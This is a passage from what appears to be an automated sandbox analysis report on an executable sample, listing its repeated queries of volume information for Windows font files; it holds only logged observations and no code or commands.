Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
